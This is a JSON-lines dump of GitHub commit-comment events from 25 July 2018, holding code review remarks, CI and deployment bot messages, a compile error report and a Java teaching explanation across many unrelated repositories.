{"id":"8015024883","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29825847,"position":null,"line":null,"path":null,"commit_id":"497ad6c4c65b6363fe6ee786a8b68be29d9e6783","created_at":"2018-07-25T08:43:10Z","updated_at":"2018-07-25T08:43:10Z","author_association":"COLLABORATOR","body":"Puzzle `352-3a47ae9f` discovered in   [`.drone.yml`](  https://github.com/fidals/shopelectro/blob/master/.drone.yml)   and submitted as #449. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-25T08:43:10Z"}
{"id":"8015028675","type":"CommitCommentEvent","actor":{"login":"bestboyvn87"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825851,"position":241,"line":155,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T08:43:50Z","updated_at":"2018-07-25T08:43:50Z","author_association":"COLLABORATOR","body":"working with this. good suggest"}},"created_at":"2018-07-25T08:43:50Z"}
{"id":"8015034003","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825856,"position":6,"line":13,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T08:44:52Z","updated_at":"2018-07-25T08:44:52Z","author_association":"MEMBER","body":"actually you still depends on it because you use `now` :D "}},"created_at":"2018-07-25T08:44:52Z"}
{"id":"8015034600","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29825857,"position":null,"line":null,"path":null,"commit_id":"dacf63258600886d177d5459b11117fe633ace39","created_at":"2018-07-25T08:44:59Z","updated_at":"2018-07-25T08:44:59Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1216)"}},"created_at":"2018-07-25T08:44:59Z"}
{"id":"8015035010","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29825859,"position":null,"line":null,"path":null,"commit_id":"be084e58412bdf2bdbf80b9782ac4314efac7358","created_at":"2018-07-25T08:45:05Z","updated_at":"2018-07-25T08:45:05Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - i386-Windows-7-VisualStudio-14: OK (2956 of 2956 tests passed, 15 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 4 tests had: EIO diffs.\n * 4 tests had: ESO small diffs.\n * 3 tests had: Table small diffs.\n * 1 test had: MTR small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T08:45:05Z"}
{"id":"8015037434","type":"CommitCommentEvent","actor":{"login":"olgunataberk"},"repo":{"name":"GitBusting/CalendarApp"},"payload":{"comment":{"id":29825865,"position":null,"line":null,"path":null,"commit_id":"a1e5b5021f6620cc977a8292443143e4611229b2","created_at":"2018-07-25T08:45:31Z","updated_at":"2018-07-25T08:45:31Z","author_association":"COLLABORATOR","body":"Actually destroyed my whole environment"}},"created_at":"2018-07-25T08:45:31Z"}
{"id":"8015039135","type":"CommitCommentEvent","actor":{"login":"ekhaled"},"repo":{"name":"EDWINADS/test2"},"payload":{"comment":{"id":29825870,"position":22,"line":40,"path":"classes/BankAccount.php","commit_id":"985ce5c67bd53c8c4ab34ee471056374f19f8bac","created_at":"2018-07-25T08:45:51Z","updated_at":"2018-07-25T08:45:51Z","author_association":"NONE","body":"```\r\nreturn $amount;\r\n```"}},"created_at":"2018-07-25T08:45:51Z"}
{"id":"8015040031","type":"CommitCommentEvent","actor":{"login":"danse"},"repo":{"name":"italia/docs-italia-convertitore-web"},"payload":{"comment":{"id":29825872,"position":22,"line":20,"path":"docs_italia_convertitore_web/forms.py","commit_id":"029e26b3fc84319d645b1f20eb6fe35579657502","created_at":"2018-07-25T08:46:01Z","updated_at":"2018-07-25T08:46:01Z","author_association":"NONE","body":"@yakky è possibile avere per ogni checkbox un'icona col punto interrogativo che punti alla voce corrispondente qui https://github.com/italia/docs-italia-comandi-conversione/blob/master/doc/comandi/converti-opzioni.md ?"}},"created_at":"2018-07-25T08:46:01Z"}
{"id":"8015041679","type":"CommitCommentEvent","actor":{"login":"JCors"},"repo":{"name":"enneadurango/Security-System"},"payload":{"comment":{"id":29825876,"position":null,"line":null,"path":null,"commit_id":"023f8325b987268e3c895cb78a196645c971d374","created_at":"2018-07-25T08:46:20Z","updated_at":"2018-07-25T08:46:20Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add Page in Github Source Code](https://trello.com/c/BtvsWSqS/82-add-page-in-github-source-code)"}},"created_at":"2018-07-25T08:46:20Z"}
{"id":"8015042886","type":"CommitCommentEvent","actor":{"login":"ekhaled"},"repo":{"name":"EDWINADS/test2"},"payload":{"comment":{"id":29825880,"position":12,"line":31,"path":"classes/BankAccount.php","commit_id":"985ce5c67bd53c8c4ab34ee471056374f19f8bac","created_at":"2018-07-25T08:46:35Z","updated_at":"2018-07-25T08:46:35Z","author_association":"NONE","body":"```\r\n$account->deposit($this->withdraw($amount));\r\n\r\n```"}},"created_at":"2018-07-25T08:46:35Z"}
{"id":"8015043399","type":"CommitCommentEvent","actor":{"login":"dvyukov"},"repo":{"name":"google/syzkaller"},"payload":{"comment":{"id":29825882,"position":4,"line":268,"path":"Makefile","commit_id":"da1670a69dbf57da6f6578ae001df1fad1d947ef","created_at":"2018-07-25T08:46:41Z","updated_at":"2018-07-25T08:46:41Z","author_association":"COLLABORATOR","body":"Right. It should have been run it. Fixed in the next commit.\r\nThanks"}},"created_at":"2018-07-25T08:46:41Z"}
{"id":"8015046852","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29825885,"position":null,"line":null,"path":null,"commit_id":"e7069d28b3ccce66e3ad5729920a708f9cade080","created_at":"2018-07-25T08:47:21Z","updated_at":"2018-07-25T08:47:21Z","author_association":"OWNER","body":"This is related to https://github.com/official-stockfish/Stockfish/issues/1673, since after many experiments(mine and others), I think that the problem is a nasty \"corner case\" which happens from time to time, however intrusively tackle the loses ELO.\r\n\r\nSo my patch gives biases (-20) to draws by both sides cases that the search is not improving from TT draw score (if I read right, the value from TT is stored in staticEval), while remain mostly unaffected if it is exploring a new leaf(alpha = VALUE_DRAW), so that it does not cost ELO in general but helps with corner cases.\r\n\r\nI intended to run the test with non-regression bounds but at [0,5] I hope of it may help with the search if this bias would let it explore away from draws if possible, or I'm just doing it wrong then it would fail more quickly."}},"created_at":"2018-07-25T08:47:21Z"}
{"id":"8015054574","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29825895,"position":null,"line":null,"path":null,"commit_id":"3f404484fd8998cbf1a7879a9480a77f3b4b2822","created_at":"2018-07-25T08:48:52Z","updated_at":"2018-07-25T08:48:52Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-fpg-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-fpg-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-fpg-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-25T08:48:52Z"}
{"id":"8015055471","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"regardscitoyens/the-law-factory"},"payload":{"comment":{"id":29825898,"position":15,"line":394,"path":"public/modules/navettes/navettes.viz.js","commit_id":"65398ce62cd8246e1019388f3c7e8a718724bce9","created_at":"2018-07-25T08:49:02Z","updated_at":"2018-07-25T08:49:02Z","author_association":"MEMBER","body":"hum, I should have done `s.date || s.enddate``"}},"created_at":"2018-07-25T08:49:02Z"}
{"id":"8015058150","type":"CommitCommentEvent","actor":{"login":"Quickdrawwill"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29825907,"position":2,"line":74,"path":"src/server/game/Movement/MovementGenerators/ChaseMovementGenerator.cpp","commit_id":"c031167e067dd0903c6fa4db4ea88cd5279039d2","created_at":"2018-07-25T08:49:33Z","updated_at":"2018-07-25T08:49:33Z","author_association":"NONE","body":"Replace false with true"}},"created_at":"2018-07-25T08:49:33Z"}
{"id":"8015065116","type":"CommitCommentEvent","actor":{"login":"Gottox"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29825920,"position":null,"line":null,"path":null,"commit_id":"e786e0067bfc97ae1d9c10b1c36083b6429cdd4b","created_at":"2018-07-25T08:50:52Z","updated_at":"2018-07-25T08:50:52Z","author_association":"MEMBER","body":"This commit breaks `guitarix2` and leaves the repository in staged mode. Reverted with e08851f7c91256485331028840ad0adcac665011"}},"created_at":"2018-07-25T08:50:52Z"}
{"id":"8015065119","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29825921,"position":null,"line":null,"path":null,"commit_id":"a615669f5c9877448b34448c4d373709a7807818","created_at":"2018-07-25T08:50:52Z","updated_at":"2018-07-25T08:50:52Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1217)"}},"created_at":"2018-07-25T08:50:52Z"}
{"id":"8015067711","type":"CommitCommentEvent","actor":{"login":"Ladicek"},"repo":{"name":"iocanel/kubernetes-client-java"},"payload":{"comment":{"id":29825925,"position":8,"line":8,"path":"kubernetes/src/main/java/io/kubernetes/client/fluent/Config.java","commit_id":"5fe87f51e6a8e71c7e1cde6b1d3d8410bd36df9e","created_at":"2018-07-25T08:51:21Z","updated_at":"2018-07-25T08:51:21Z","author_association":"NONE","body":"typo"}},"created_at":"2018-07-25T08:51:21Z"}
{"id":"8015070623","type":"CommitCommentEvent","actor":{"login":"Wesley-VanNeck"},"repo":{"name":"caoli5288/ProtocolSupportPocketStuff"},"payload":{"comment":{"id":29825928,"position":null,"line":null,"path":null,"commit_id":"ce8007ab1539b4c8fa15732059e125dfbcc440cb","created_at":"2018-07-25T08:51:53Z","updated_at":"2018-07-25T08:51:53Z","author_association":"NONE","body":"@caoli5288 i cant seem to compile it \r\n\r\n`:compileJava\r\nC:\\Users\\wesley\\Downloads\\ProtocolSupportPocketStuff-i5mc\\src\\protocolsupportpocketstuff\\hacks\\holograms\\HologramsPacketListener.java:99: error: cannot find symbol\r\n        if (packetId == PEPacketIDs.MOVE_ENTITY_ABSOLUTE) {\r\n                                   ^\r\n  symbol:   variable MOVE_ENTITY_ABSOLUTE\r\n  location: class PEPacketIDs\r\nC:\\Users\\wesley\\Downloads\\ProtocolSupportPocketStuff-i5mc\\src\\protocolsupportpocketstuff\\hacks\\holograms\\HologramsPacketListener.java:176: error: cannot find symbol\r\n            armorStand.spawnHologram(con.getNetworkDataCache().getWatchedEntity((int) entityId), this);\r\n                                        ^\r\n  symbol:   method getNetworkDataCache()\r\n  location: variable con of type Connection\r\nC:\\Users\\wesley\\Downloads\\ProtocolSupportPocketStuff-i5mc\\src\\protocolsupportpocketstuff\\hacks\\holograms\\HologramsPacketListener.java:207: error: cannot find symbol\r\n            armorStand.spawnHologram(con.getNetworkDataCache().getWatchedEntity((int) entityId), this);\r\n                                        ^\r\n  symbol:   method getNetworkDataCache()\r\n  location: variable con of type Connection\r\nC:\\Users\\wesley\\Downloads\\ProtocolSupportPocketStuff-i5mc\\src\\protocolsupportpocketstuff\\hacks\\itemframes\\ItemFramesPacketListener.java:262: error: cannot find symbol\r\n                if (packetId == PEPacketIDs.INVENTORY_TRANSACTION) { // GodPacket, now on ProtocolSupportPocketStuff!\r\n                                           ^\r\n  symbol:   variable INVENTORY_TRANSACTION\r\n  location: class PEPacketIDs\r\nC:\\Users\\wesley\\Downloads\\ProtocolSupportPocketStuff-i5mc\\src\\protocolsupportpocketstuff\\packet\\play\\EntityDataPacket.java:32: error: cannot find symbol\r\n                EntityMetadata.write(serializer, connection.getVersion(), I18NData.DEFAULT_LOCALE, metadata);\r\n                              ^\r\n  symbol:   method write(ByteBuf,ProtocolVersion,String,ArrayMap<DataWatcherObject<?>>)\r\n  location: class EntityMetadata\r\nC:\\Users\\wesley\\Downloads\\ProtocolSupportPocketStuff-i5mc\\src\\protocolsupportpocketstuff\\packet\\play\\SpawnEntityPacket.java:78: error: cannot find symbol\r\n                EntityMetadata.write(serializer, connection.getVersion(), I18NData.DEFAULT_LOCALE, metadata);\r\n                              ^\r\n  symbol:   method write(ByteBuf,ProtocolVersion,String,ArrayMap<DataWatcherObject<?>>)\r\n  location: class EntityMetadata\r\nC:\\Users\\wesley\\Downloads\\ProtocolSupportPocketStuff-i5mc\\src\\protocolsupportpocketstuff\\packet\\play\\SpawnPlayerPacket.java:79: error: cannot find symbol\r\n                EntityMetadata.write(serializer, connection.getVersion(), I18NData.DEFAULT_LOCALE, metadata);\r\n                              ^\r\n  symbol:   method write(ByteBuf,ProtocolVersion,String,ArrayMap<DataWatcherObject<?>>)\r\n  location: class EntityMetadata\r\nC:\\Users\\wesley\\Downloads\\ProtocolSupportPocketStuff-i5mc\\src\\protocolsupportpocketstuff\\skin\\PcToPeProvider.java:13: error: PcToPeProvider is not abstract and does not override abstract method scheduleGetSkinData(String,Consumer<byte[]>) in PESkinsProvider\r\npublic class PcToPeProvider extends PESkinsProvider {\r\n       ^\r\nC:\\Users\\wesley\\Downloads\\ProtocolSupportPocketStuff-i5mc\\src\\protocolsupportpocketstuff\\skin\\PcToPeProvider.java:30: error: method does not override or implement a method from a supertype\r\n        @Override\r\n        ^`"}},"created_at":"2018-07-25T08:51:53Z"}
{"id":"8015072347","type":"CommitCommentEvent","actor":{"login":"Wesley-VanNeck"},"repo":{"name":"caoli5288/ProtocolSupportPocketStuff"},"payload":{"comment":{"id":29825932,"position":null,"line":null,"path":null,"commit_id":"ce8007ab1539b4c8fa15732059e125dfbcc440cb","created_at":"2018-07-25T08:52:14Z","updated_at":"2018-07-25T08:52:14Z","author_association":"NONE","body":"do you know why?\r\n"}},"created_at":"2018-07-25T08:52:14Z"}
{"id":"8015072749","type":"CommitCommentEvent","actor":{"login":"felipemoran"},"repo":{"name":"felipemoran/get-started-python"},"payload":{"comment":{"id":29825933,"position":null,"line":null,"path":null,"commit_id":"500d0c9ea6ea42d18d2ba5f2b4701a788773fb7f","created_at":"2018-07-25T08:52:18Z","updated_at":"2018-07-25T08:52:18Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/bb723936-a2f8-428d-bc40-0670ef9c4242?env_id=ibm%3Ayp%3Aeu-gb \"test_toolchain_3\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/5d773d13-3e84-4c94-871e-3f81444267fd?env_id=ibm%3Ayp%3Aeu-gb \"test_pipeline\") deployed [get-started-python](https://github.com/felipemoran/get-started-python/releases/tag/deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180725-085216 \"deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180725-085216\") to [test](https://console.bluemix.net/apps/48741af3-57af-451a-87a0-93d3b55304f0?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:felipe.moran-correa-meyer:test\"), including this commit"}},"created_at":"2018-07-25T08:52:18Z"}
{"id":"8015075053","type":"CommitCommentEvent","actor":{"login":"linxcodev"},"repo":{"name":"linxcodev/Belajar-laravel"},"payload":{"comment":{"id":29825935,"position":31,"line":15,"path":"resources/views/blog/home.blade.php","commit_id":"0477c7454efa3d0b90c30531b5bc7e76019e124b","created_at":"2018-07-25T08:52:44Z","updated_at":"2018-07-25T08:52:44Z","author_association":"OWNER","body":"{!! gunakan tag ini agar tag di html berjalan !!}"}},"created_at":"2018-07-25T08:52:44Z"}
{"id":"8015079469","type":"CommitCommentEvent","actor":{"login":"zardyh"},"repo":{"name":"tmpim/luadash"},"payload":{"comment":{"id":29825945,"position":6,"line":6,"path":"doc/sort.txt","commit_id":"b31ef6475b3bc448e77c8c7d2131147f883df449","created_at":"2018-07-25T08:53:35Z","updated_at":"2018-07-25T08:53:35Z","author_association":"COLLABORATOR","body":"PRs welcome.\n\nOn Wed, 25 Jul 2018, 03:43 Lur, <notifications@github.com> wrote:\n\n> _.sort_with doesn't exist- this should be _.sort_by\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tmpim/luadash/commit/b31ef6475b3bc448e77c8c7d2131147f883df449#commitcomment-29824572>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AckdzwjY2mUuK3DLaBQUxQsxu1OmgphZks5uKBN4gaJpZM4VfhUg>\n> .\n>\n"}},"created_at":"2018-07-25T08:53:35Z"}
{"id":"8015080509","type":"CommitCommentEvent","actor":{"login":"Infinisil"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29825948,"position":null,"line":null,"path":null,"commit_id":"b619e0b016c5c79920aa06b78ccf936e56eaf45d","created_at":"2018-07-25T08:53:47Z","updated_at":"2018-07-25T08:53:47Z","author_association":"CONTRIBUTOR","body":"I was just about to push that fix too, but you were quicker :)"}},"created_at":"2018-07-25T08:53:47Z"}
{"id":"8015081178","type":"CommitCommentEvent","actor":{"login":"siberio2000"},"repo":{"name":"siberio2000/version_control_practice"},"payload":{"comment":{"id":29825949,"position":10,"line":10,"path":"v_control.html","commit_id":"38b10e80cd7872364eb4d1bc24754984a076843c","created_at":"2018-07-25T08:53:55Z","updated_at":"2018-07-25T08:53:55Z","author_association":"OWNER","body":"This is v_1 file"}},"created_at":"2018-07-25T08:53:55Z"}
{"id":"8015082573","type":"CommitCommentEvent","actor":{"login":"sakai-y"},"repo":{"name":"ikoamu/Zaseki"},"payload":{"comment":{"id":29825952,"position":null,"line":null,"path":null,"commit_id":"e55d97e7a1521edbae28252d00d54e806037d304","created_at":"2018-07-25T08:54:10Z","updated_at":"2018-07-25T08:54:10Z","author_association":"NONE","body":"`thenReturn(memberList)`の引数`memberList`に、`findAll()`で取得される（ことが期待される）データを渡す必要があります。\r\n\r\nかつ、結果を`.andExpect()`で記述する必要がありますね。\r\n\r\nまずは、モックが意図した通りにセットアップできているか（`when()`〜`thenReturn()`）を確認するために、Controllerのコードをデバッグしてみるのもアリです。"}},"created_at":"2018-07-25T08:54:10Z"}
{"id":"8015087643","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"regardscitoyens/the-law-factory"},"payload":{"comment":{"id":29825966,"position":15,"line":394,"path":"public/modules/navettes/navettes.viz.js","commit_id":"65398ce62cd8246e1019388f3c7e8a718724bce9","created_at":"2018-07-25T08:55:08Z","updated_at":"2018-07-25T08:55:08Z","author_association":"CONTRIBUTOR","body":"yep mieux!"}},"created_at":"2018-07-25T08:55:08Z"}
{"id":"8015088725","type":"CommitCommentEvent","actor":{"login":"djui"},"repo":{"name":"alecthomas/gometalinter"},"payload":{"comment":{"id":29825969,"position":null,"line":null,"path":null,"commit_id":"445bce7956d2cd3b792db2ce3323d4fd31aa7d80","created_at":"2018-07-25T08:55:19Z","updated_at":"2018-07-25T08:55:19Z","author_association":"NONE","body":"This change breaks backward compatibility, if one has a configuration to disable `gas`.\r\n\r\nThe second time in recent weeks (see `fmt.*`). I understand there no compatibility guarantee given in the first place, and one could at least try to prevent some of these breaking changes by either strictly enabling linters to include or pin the binary version, but I would prefer that the behavior only changes explicitly, scheduled, informed, if at all. \r\n\r\n"}},"created_at":"2018-07-25T08:55:19Z"}
{"id":"8015089893","type":"CommitCommentEvent","actor":{"login":"caoli5288"},"repo":{"name":"caoli5288/ProtocolSupportPocketStuff"},"payload":{"comment":{"id":29825973,"position":null,"line":null,"path":null,"commit_id":"ce8007ab1539b4c8fa15732059e125dfbcc440cb","created_at":"2018-07-25T08:55:34Z","updated_at":"2018-07-25T08:55:34Z","author_association":"OWNER","body":"It's target my private protocolsupport branch so you cannot compile it with origin one.\r\nYou can simply modify the code to target origin protocolsupport.\r\nOr wait I publish my private branch after all things stable:-)"}},"created_at":"2018-07-25T08:55:34Z"}
{"id":"8015089949","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"regardscitoyens/the-law-factory"},"payload":{"comment":{"id":29825974,"position":69,"line":911,"path":"public/modules/navettes/navettes.viz.js","commit_id":"65398ce62cd8246e1019388f3c7e8a718724bce9","created_at":"2018-07-25T08:55:34Z","updated_at":"2018-07-25T08:55:34Z","author_association":"CONTRIBUTOR","body":"good call!"}},"created_at":"2018-07-25T08:55:34Z"}
{"id":"8015097154","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29825989,"position":null,"line":null,"path":null,"commit_id":"43376ffc628d10277c339a72ee876aff218ee405","created_at":"2018-07-25T08:56:54Z","updated_at":"2018-07-25T08:56:54Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1218)"}},"created_at":"2018-07-25T08:56:54Z"}
{"id":"8015099230","type":"CommitCommentEvent","actor":{"login":"TobuGone"},"repo":{"name":"michaelliao/learngit"},"payload":{"comment":{"id":29825992,"position":null,"line":null,"path":null,"commit_id":"dd6302a3434a67fc115e3c7a1543c59667e6161c","created_at":"2018-07-25T08:57:18Z","updated_at":"2018-07-25T08:57:18Z","author_association":"NONE","body":"路过~"}},"created_at":"2018-07-25T08:57:18Z"}
{"id":"8015099320","type":"CommitCommentEvent","actor":{"login":"samiwel"},"repo":{"name":"ONSdigital/eq-schema-validator"},"payload":{"comment":{"id":29825993,"position":null,"line":null,"path":null,"commit_id":"35a7a51022e6bd31467cac721e4dea4ac71fc489","created_at":"2018-07-25T08:57:19Z","updated_at":"2018-07-25T08:57:19Z","author_association":"CONTRIBUTOR","body":"@jonnyshaw89 does Publisher need to update to support this change, I guess we can't preview any questionnaires now?"}},"created_at":"2018-07-25T08:57:19Z"}
{"id":"8015103796","type":"CommitCommentEvent","actor":{"login":"TobuGone"},"repo":{"name":"michaelliao/learngit"},"payload":{"comment":{"id":29825996,"position":null,"line":null,"path":null,"commit_id":"d8aff6d0a13ba4e3ef460b67775421460ab5669e","created_at":"2018-07-25T08:58:10Z","updated_at":"2018-07-25T08:58:10Z","author_association":"NONE","body":"2333"}},"created_at":"2018-07-25T08:58:10Z"}
{"id":"8015104686","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29825997,"position":null,"line":null,"path":null,"commit_id":"0c3d79ee7a752ee676f7c81467f4ded89bc2400b","created_at":"2018-07-25T08:58:19Z","updated_at":"2018-07-25T08:58:19Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-fpg-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-fpg-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-fpg-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-25T08:58:19Z"}
{"id":"8015106370","type":"CommitCommentEvent","actor":{"login":"boczkas"},"repo":{"name":"gacikjakub/BattleShips"},"payload":{"comment":{"id":29826000,"position":28,"line":28,"path":"backend/src/test/java/pl/krkteam/battleships/common/dto/CoordinateDTOTest.java","commit_id":"1ed3aa7ecad39a810c4ed790a5e744f2fb7083dc","created_at":"2018-07-25T08:58:38Z","updated_at":"2018-07-25T08:58:38Z","author_association":"COLLABORATOR","body":"\\n"}},"created_at":"2018-07-25T08:58:38Z"}
{"id":"8015106584","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29826001,"position":21,"line":21,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/challenges/Flights/Application.java","commit_id":"ebbb244a9317ee96f790ece42942bd85da3f7cce","created_at":"2018-07-25T08:58:40Z","updated_at":"2018-07-25T08:58:40Z","author_association":"NONE","body":"Brakuje nazwy klasy (Board) przed wywołaniem metody getAllFlights();"}},"created_at":"2018-07-25T08:58:40Z"}
{"id":"8015108253","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29826003,"position":11,"line":11,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/challenges/Flights/Board.java","commit_id":"ebbb244a9317ee96f790ece42942bd85da3f7cce","created_at":"2018-07-25T08:58:58Z","updated_at":"2018-07-25T08:58:58Z","author_association":"NONE","body":"Czemu użyłaś Optionali?"}},"created_at":"2018-07-25T08:58:58Z"}
{"id":"8015108646","type":"CommitCommentEvent","actor":{"login":"felipemoran"},"repo":{"name":"felipemoran/get-started-python"},"payload":{"comment":{"id":29826004,"position":null,"line":null,"path":null,"commit_id":"e2cc02f533a82b0fc95f7120e7a207af361d954b","created_at":"2018-07-25T08:59:02Z","updated_at":"2018-07-25T08:59:02Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/bb723936-a2f8-428d-bc40-0670ef9c4242?env_id=ibm%3Ayp%3Aeu-gb \"test_toolchain_3\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/5d773d13-3e84-4c94-871e-3f81444267fd?env_id=ibm%3Ayp%3Aeu-gb \"test_pipeline\") deployed [get-started-python](https://github.com/felipemoran/get-started-python/releases/tag/deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180725-085901 \"deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180725-085901\") to [test](https://console.bluemix.net/apps/775337c4-e265-4d02-9041-2b76d11e52d0?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:felipe.moran-correa-meyer:test\"), including this commit"}},"created_at":"2018-07-25T08:59:02Z"}
{"id":"8015114670","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29826015,"position":11,"line":8,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"23b72843845deb9903f472bc5d2ec5122c1dfc82","created_at":"2018-07-25T09:00:09Z","updated_at":"2018-07-25T09:00:09Z","author_association":"NONE","body":"Вот, это хорошо, сейчас разберёмся) Итак, перед нами то, что должно в итоге получиться: ```MySystem.myOut.myPrintln(\"Hello world\");```\r\nЧто мы здесь видим:\r\n- ```MySystem``` - это должно быть имя класса, поскольку PascalNotation. Этот класс может быть внешний или встроенный в текущий класс, в данном случае это без разницы.\r\n- ```myOut``` - это должно быть имя статического поля, т.к. оно идёт после имени класса, записан в camelNotation, и не содержит скобок, как у методов\r\n- ```myPrintln()``` - это должно быть не-статическим методом, т.к. он идёт после поля, а не класса, записан в camelNotation, и он содержит скобки, как у методов.\r\n\r\nТак же про метод можно сказать, что он должен явно принимать в качестве параметра строчное значение. Насчёт его возвращаемого значения ничего сказать нельзя - он может возвращать или не возвращать значение, в данном случае без разницы, но пусть для простоты не возвращает.\r\n\r\nСамое интересное - это какой тип у поля ```myOut```? У этого типа должен быть не-статический метод ```myPrintln()```, такой вряд ли найдётся среди примитивных типов или стандартных классов, значит это должен быть пользовательский класс - т.е. тот класс, который мы сами напишем. В принципе, это мог бы быть даже тот же самый класс ```MySystem```, который бы содержал статический экземпляр самого себя, а также олпределдял бы не-статический метод ```myPrintln()```. Такое может быть, но если мы обратим внимание на название - ```myOut``` - то мы можем предположить, что класс, экземпляр которого хранится в этом поле, также как-то связан с ```Out```. Обычно переменные как-то отражают в своих названиях имена своих типов. Так что этот класс мог называться, например, ```MyOutput```. Класс этот может быть как внешним, так и вложенным, тут это снова без разницы - главное, чтобы он был доступен и в классе ```MySystem```, и в текущем коде.\r\n\r\nПроделав такой анализ мы теперь можем попорбовать написать код, соответствующий всем выявленнным ограничениям.\r\n\r\n"}},"created_at":"2018-07-25T09:00:09Z"}
{"id":"8015117515","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29826029,"position":null,"line":null,"path":null,"commit_id":"4b7f07c3d7af6013be73f7ddd0b2cdbbc5116d3b","created_at":"2018-07-25T09:00:37Z","updated_at":"2018-07-25T09:00:37Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1219)"}},"created_at":"2018-07-25T09:00:37Z"}
{"id":"8015122552","type":"CommitCommentEvent","actor":{"login":"alguret"},"repo":{"name":"Viktik/Yii"},"payload":{"comment":{"id":29826037,"position":8,"line":19,"path":"console/migrations/m180725_065824_posts.php","commit_id":"de9623483d3a7cdb955511f6c7fa7acdc6b7ed49","created_at":"2018-07-25T09:01:31Z","updated_at":"2018-07-25T09:01:31Z","author_association":"NONE","body":"foreign key на таблицу юзеров"}},"created_at":"2018-07-25T09:01:31Z"}
